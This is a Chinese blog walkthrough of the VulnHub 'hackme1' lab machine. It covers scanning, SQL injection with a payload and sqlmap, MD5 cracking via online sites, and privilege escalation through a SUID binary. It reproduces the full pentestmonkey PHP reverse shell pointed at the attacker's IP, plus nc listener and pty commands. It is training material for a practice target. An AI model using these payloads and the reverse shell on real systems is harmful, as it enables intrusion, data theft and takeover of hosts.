靶机渗透练习13-hackme1

靶机描述

靶机地址:https://www.vulnhub.com/entry/hackme-1,330/

Description

'hackme' is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

'hackme' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali

IP地址:192.168.184.128

靶机

IP地址:192.168.184.149

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

image-20220110164549218

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

image-20220110165448032

可以发现有 2 个端口开放,22 和 80

2.1.3 尝试访问靶机网页

image-20220110165925503

2.2枚举漏洞

22 端口分析

一般只能暴力破解,暂时没有合适的字典

80 端口分析

访问网站, 发现是一个登陆页面

image-20220110170217436

image-20220110170424128

成功登录后

image-20220110170459764

尝试手工注入:x' or 1=1#

image-20220110170545322

成功返回所有信息,说明存在SQL注入

2.3漏洞利用

2.3.1 sqlmap 利用注入漏洞

使用 burp 抓查询数据包

image-20220110171403705

POST /welcome.php HTTP/1.1
Host: 192.168.184.149
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.184.149
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.184.149/welcome.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3
Connection: close

search=x

将数据包保存为文件 hackme1.txt
使用 sqlmap 跑一下测试漏洞并获取数据库名:

🚀  python sqlmap.py -r hackme1.txt --dbs --batch

image-20220110171527015

数据库除了基础数据库有webapphacking

接下来咱们获取一下表名

🚀  python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables

image-20220110172336353

可以得到两个表booksusers

咱们先获取一下users表的信息

🚀  python sqlmap.py -r hackme1.txt --batch -D webapphacking  -T users --dump --batch

image-20220110172611643

可以看到有一个 superadmin,超级管理员,看起来像一个md5

扩展

在线解密md5网站

国内MD5解密:
http://t007.cn/
https://cmd5.la/
https://cmd5.com/
https://pmd5.com/
http://ttmd5.com/
https://md5.navisec.it/
http://md5.tellyou.top/
https://www.somd5.com/
http://www.chamd5.org/
国外MD5解密:
https://www.md5tr.com/
http://md5.my-addr.com/
https://md5.gromweb.com/
https://www.md5decrypt.org/
https://md5decrypt.net/en/
https://md5hashing.net/hash/md5/
https://hashes.com/en/decrypt/hash
https://www.whatsmyip.org/hash-lookup/
https://www.md5online.org/md5-decrypt.html
https://md5-passwort.de/md5-passwort-suchen

image-20220110172854804

解出来密码是:Uncrackable

登录上去,发现有上传功能

image-20220110173107353

2.3.2 文件上传漏洞 getshell

将 kali 自带的 php-reverse-shell.php 复制一份到

image-20220110173434923

查看文件内容,并修改IP地址

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.184.128';  // CHANGE THIS
$port = 6666;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

image-20220110173559344

上传该文件

image-20220110173801442

在 kali 监听:nc -lvp 6666

访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功
尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问

image-20220110174000535

使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")'

2.4权限提升

2.4.1 SUID 提权

sudo -l不顶用了,换个方法

查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null

www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/1270/usr/bin/chfn
/snap/core20/1270/usr/bin/chsh
/snap/core20/1270/usr/bin/gpasswd
/snap/core20/1270/usr/bin/mount
/snap/core20/1270/usr/bin/newgrp
/snap/core20/1270/usr/bin/passwd
/snap/core20/1270/usr/bin/su
/snap/core20/1270/usr/bin/sudo
/snap/core20/1270/usr/bin/umount
/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1270/usr/lib/openssh/ssh-keysign
/snap/core/6531/bin/mount
/snap/core/6531/bin/ping
/snap/core/6531/bin/ping6
/snap/core/6531/bin/su
/snap/core/6531/bin/umount
/snap/core/6531/usr/bin/chfn
/snap/core/6531/usr/bin/chsh
/snap/core/6531/usr/bin/gpasswd
/snap/core/6531/usr/bin/newgrp
/snap/core/6531/usr/bin/passwd
/snap/core/6531/usr/bin/sudo
/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6531/usr/lib/openssh/ssh-keysign
/snap/core/6531/usr/lib/snapd/snap-confine
/snap/core/6531/usr/sbin/pppd
/snap/core/5662/bin/mount
/snap/core/5662/bin/ping
/snap/core/5662/bin/ping6
/snap/core/5662/bin/su
/snap/core/5662/bin/umount
/snap/core/5662/usr/bin/chfn
/snap/core/5662/usr/bin/chsh
/snap/core/5662/usr/bin/gpasswd
/snap/core/5662/usr/bin/newgrp
/snap/core/5662/usr/bin/passwd
/snap/core/5662/usr/bin/sudo
/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/5662/usr/lib/openssh/ssh-keysign
/snap/core/5662/usr/lib/snapd/snap-confine
/snap/core/5662/usr/sbin/pppd
/snap/core/11993/bin/mount
/snap/core/11993/bin/ping
/snap/core/11993/bin/ping6
/snap/core/11993/bin/su
/snap/core/11993/bin/umount
/snap/core/11993/usr/bin/chfn
/snap/core/11993/usr/bin/chsh
/snap/core/11993/usr/bin/gpasswd
/snap/core/11993/usr/bin/newgrp
/snap/core/11993/usr/bin/passwd
/snap/core/11993/usr/bin/sudo
/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/11993/usr/lib/openssh/ssh-keysign
/snap/core/11993/usr/lib/snapd/snap-confine
/snap/core/11993/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount

发现一个可疑文件 /home/legacy/touchmenot
https://gtfobins.github.io/网站上查询:touchmenot 没找到
尝试运行程序:发现直接提权成功

image-20220110174530827

找半天没找到flag的文件

what?就这?

总结

本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞

  1. sql 注入工具:sqlmap
  2. 抓包工具:burpsuite
  3. Webshell 后门:kali 内置后门
  4. Suid 提权:touchmenot 提权
posted @ 2022-04-01 21:28  hirak0  阅读(251)  评论(0编辑  收藏  举报